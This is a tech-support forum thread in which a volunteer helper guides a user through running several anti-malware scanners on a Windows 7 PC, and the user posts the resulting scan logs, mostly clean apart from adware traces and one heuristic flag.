OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: Kevin

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 365369
Time Elapsed: 17 min, 49 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Deep Rootkit Scan: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)



#10 TsVk!

TsVk!

    penguin farmer


  • Members
  • 6,234 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Antipodes
  • Local time:03:03 AM

Posted 26 October 2016 - 12:06 AM

Hi jumpman17,

 

Did you configure manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

Did you configure manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

 

Please follow these instructions.

 

ESET Online scanner

 

Follow this link or right click and "copy link location", then paste the link into the address bar on your newly opened browser instance

  • click "SCAN NOW"

Note: If using Mozilla Firefox you will need to download esetsmartinstaller_enu.exe when prompted then double click on it to install.

  • Firstly, Accept the Terms and click Start
  • Click Enable detection of potentially unwanted applications
  • Do not change any of the Advanced options
  • Click Scan.

ESET will then download updates and begin scanning your computer. Please be patient as this can take some time.

  • When the scan completes click Save to a text file and save it to your desktop. Note: If no malware was found you will not get a list.
  • Click Do not clean
  • Check Remove application data and then click Finish
  • Please copy the log in your reply.

Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

Please include in your reply

  • answers to the questions about your system settings
  • ESET log
  • FSS log

TsVk!



#11 jumpman17

jumpman17
  • Topic Starter

  • Members
  • 25 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:12:03 PM

Posted 27 October 2016 - 07:18 AM

I'm having a problem running the ESET Online Scanner. I've tried twice now. It gets about 75% of the way through, and then everything on the eset program disappears and it's just a grey window with a minimize and close button in the corner. It seems to continue scanning as the progress bar continues on my start bar. I've let it finish but the window is still blank. Before the contents of the window disappear, it had found a few items up until that point. The second time I ran it I even made sure that no other programs were running in the background and did not use the computer at all, but it still had the same result.



#12 TsVk!


Posted 27 October 2016 - 05:21 PM

That happens sometimes....

 

Did you configure manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

Did you configure manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

 

Please download Hitman Pro, choose 32bit or 64bit depending on your Windows version. If you are unsure click here

  • Run the installer and click Next
  • Accept the terms and click Next
  • Select "No, I only want to perform a one time scan to check the computer"
  • Click Next to start the scan
  • When completed click Save Log, adjacent to the green "Buy Now" button, and then save the log.
  • Copy and paste the content of the log into your reply.

Please download Farbar Service Scanner and run it

  • Please check all of the boxes then click Scan
  • It will create a log (FSS.txt) in the same directory the tool is run.
  • Please copy and paste the log into your reply.

Please include in your reply

  • answers to the questions about your system settings
  • Hitman log
  • FSS log

TsVk!


Edited by TsVk!, 27 October 2016 - 05:26 PM.


#13 jumpman17


Posted 27 October 2016 - 06:07 PM

Did you configure manually that you don't receive notifications to install non-Windows software? Do you want it to remain like this?

I'm not entirely sure what you're asking, but I don't think I ever changed anything like this.

 

Did you configure manually that your Downloads folder appears in your start menu? Do you want it to remain like this?

I did not configure this, but I don't even see a Downloads folder anywhere in my start menu.

 

-------------------------------------------------------------------------------------------------------------------------------------------------

 

HitmanPro 3.7.14.280
www.hitmanpro.com

   Computer name . . . . : KEVIN-PC
   Windows . . . . . . . : 6.1.1.7601.X64/2
   User name . . . . . . : Kevin-PC\Kevin
   UAC . . . . . . . . . : Disabled
   License . . . . . . . : Free

   Scan date . . . . . . : 2016-10-27 18:24:32
   Scan mode . . . . . . : Normal
   Scan duration . . . . : 7m 52s
   Disk access mode  . . : Direct disk access (SRB)
   Cloud . . . . . . . . : Internet
   Reboot  . . . . . . . : No

   Threats . . . . . . . : 0
   Traces  . . . . . . . : 172

   Objects scanned . . . : 2,959,569
   Files scanned . . . . : 49,376
   Remnants scanned  . . : 487,937 files / 2,422,256 keys

Miniport ____________________________________________________________________

   Primary
      DriverObject . . . : FFFFFA80045C1E70
      DriverName . . . . : \Driver\atapi
      DriverPath . . . . : \SystemRoot\system32\drivers\atapi.sys
      StartIo  . . . . . : 0000000000000000 +0
      IRP_MJ_SCSI  . . . : FFFFFA800442E2C0 +0
   Solution
      DriverObject . . . : FFFFFA80045C1E70
      DriverName . . . . : \Driver\atapi
      DriverPath . . . . : \SystemRoot\system32\drivers\atapi.sys
      StartIo  . . . . . : 0000000000000000 +0
      IRP_MJ_SCSI  . . . : FFFFF88000DC44D8 \SystemRoot\system32\drivers\ataport.SYS+29912

Suspicious files ____________________________________________________________

   C:\Users\Kevin\Desktop\virusfix\FRST64.exe
      Size . . . . . . . : 2,407,424 bytes
      Age  . . . . . . . : 8.8 days (2016-10-19 00:11:22)
      Entropy  . . . . . : 7.6
      SHA-256  . . . . . : D716445A0AECB02C49F5E33D9D8B0BC34AA0F0BAF4DFAFBD51ABFBC7C36A39B7
      Needs elevation  . : Yes
      Fuzzy  . . . . . . : 23.0
         Program has no publisher information but prompts the user for permission elevation.
         Entropy (or randomness) indicates the program is encrypted, compressed or obfuscated. This is not typical for most programs.
         Authors name is missing in version info. This is not common to most programs.
         Version control is missing. This file is probably created by an individual. This is not typical for most programs.
         Time indicates that the file appeared recently on this computer.


Potential Unwanted Programs _________________________________________________

   HKLM\SOFTWARE\Classes\Interface\{6E780F0B-BCD6-40CB-B2DB-7AF47AB4D4A4}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Interface\{78CE34FD-F6D4-4866-B79C-A37268D06A04}\ (WinToFlash)
   HKLM\SOFTWARE\Classes\Interface\{80904944-C726-4C7D-A452-3FFF2A882095}\ (WinToFlash)
   HKLM\SOFTWARE\Classes\Interface\{A138BE8B-F051-4802-9A3F-A750A6D862D4}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Wow6432Node\Interface\{B3E37FAA-3669-4212-A35D-157BF70ADC04}\ (CouponBar)
   HKLM\SOFTWARE\Classes\Wow6432Node\Interface\{E755701B-A61B-4194-8902-17A61C4C1672}\ (CouponBar)
   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC}\ (CouponBar)
   HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}\ (CouponBar)
   HKU\S-1-5-21-1764878690-1872824068-2637823629-1001\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{1A53AD8B-D0B9-4E7F-88E4-50C07A65F2DC}\ (CouponBar)

Cookies _____________________________________________________________________


 

-------------------------------------------------------------------------------------------------------------------------------------------------

 

Farbar Service Scanner Version: 27-01-2016
Ran by Kevin (administrator) on 27-10-2016 at 18:57:35
Running from "C:\Users\Kevin\Desktop\virusfix"
Microsoft Windows 7 Ultimate  Service Pack 1 (X64)
Boot Mode: Normal
****************************************************************

Internet Services:
============

Connection Status:
==============
Localhost is accessible.
LAN connected.
Google IP is accessible.
Google.com is accessible.
Yahoo.com is accessible.


Windows Firewall:
=============

Firewall Disabled Policy:
==================
"HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\\EnableFirewall" registry value does not exist.


System Restore:
============

System Restore Policy:
========================


Action Center:
============

Action Center Notification Icon =====> Unable to open HKLM\...\ShellServiceObjects\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A} key. The key does not exist.


Windows Update:
============

Windows Autoupdate Disabled Policy:
============================


Windows Defender:
==============

Other Services:
==============
Checking FirewallRules of SharedAccess: ATTENTION!=====> Unable to open "SharedAccess\Defaults\FirewallPolicy\FirewallRules" registry key. The key does not exist.


File Check:
========
C:\Windows\System32\nsisvc.dll => File is digitally signed
C:\Windows\System32\drivers\nsiproxy.sys => File is digitally signed
C:\Windows\System32\dhcpcore.dll => File is digitally signed
C:\Windows\System32\drivers\afd.sys => File is digitally signed
C:\Windows\System32\drivers\tdx.sys => File is digitally signed
C:\Windows\System32\Drivers\tcpip.sys => File is digitally signed
C:\Windows\System32\dnsrslvr.dll => File is digitally signed
C:\Windows\System32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\System32\mpssvc.dll => File is digitally signed
C:\Windows\System32\bfe.dll => File is digitally signed
C:\Windows\System32\drivers\mpsdrv.sys => File is digitally signed
C:\Windows\System32\SDRSVC.dll => File is digitally signed
C:\Windows\System32\vssvc.exe => File is digitally signed
C:\Windows\System32\wscsvc.dll => File is digitally signed
C:\Windows\System32\wbem\WMIsvc.dll => File is digitally signed
C:\Windows\System32\wuaueng.dll => File is digitally signed
C:\Windows\System32\qmgr.dll => File is digitally signed
C:\Windows\System32\es.dll => File is digitally signed
C:\Windows\System32\cryptsvc.dll => File is digitally signed
C:\Program Files\Windows Defender\MpSvc.dll => File is digitally signed
C:\Windows\System32\ipnathlp.dll => File is digitally signed
C:\Windows\System32\iphlpsvc.dll => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed


**** End of log ****
 



#14 TsVk!


Posted 27 October 2016 - 06:16 PM

Thanks, just one more thing...

 

Download Security Check from here or here and save it to your Desktop.

  • Double-click SecurityCheck.exe
  • Follow the onscreen instructions inside of the black box.
  • Please copy and paste the log into your reply.


#15 jumpman17


Posted 27 October 2016 - 09:59 PM

 Results of screen317's Security Check version 1.014 --- 12/23/15  
 Windows 7 Service Pack 1 x64 (UAC is disabled!)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:``````````````
 Windows Firewall Enabled!  
 WMI entry may not exist for antivirus; attempting automatic update.
`````````Anti-malware/Other Utilities Check:`````````
 JavaFX 2.1.1    
 Java 8 Update 91  
 Java version 32-bit out of Date!
 Adobe Flash Player 21.0.0.242  
 Adobe Reader XI  
 Mozilla Firefox (49.0.2)
 Google Chrome (53.0.2785.143)
 Google Chrome (54.0.2840.71)
 Google Chrome (SetupMetrics...)
````````Process Check: objlist.exe by Laurent````````  
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Kevin Desktop virusfix SecurityCheck.exe
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check`````````````````
 Total Fragmentation on Drive C: 0%
````````````````````End of Log``````````````````````
 





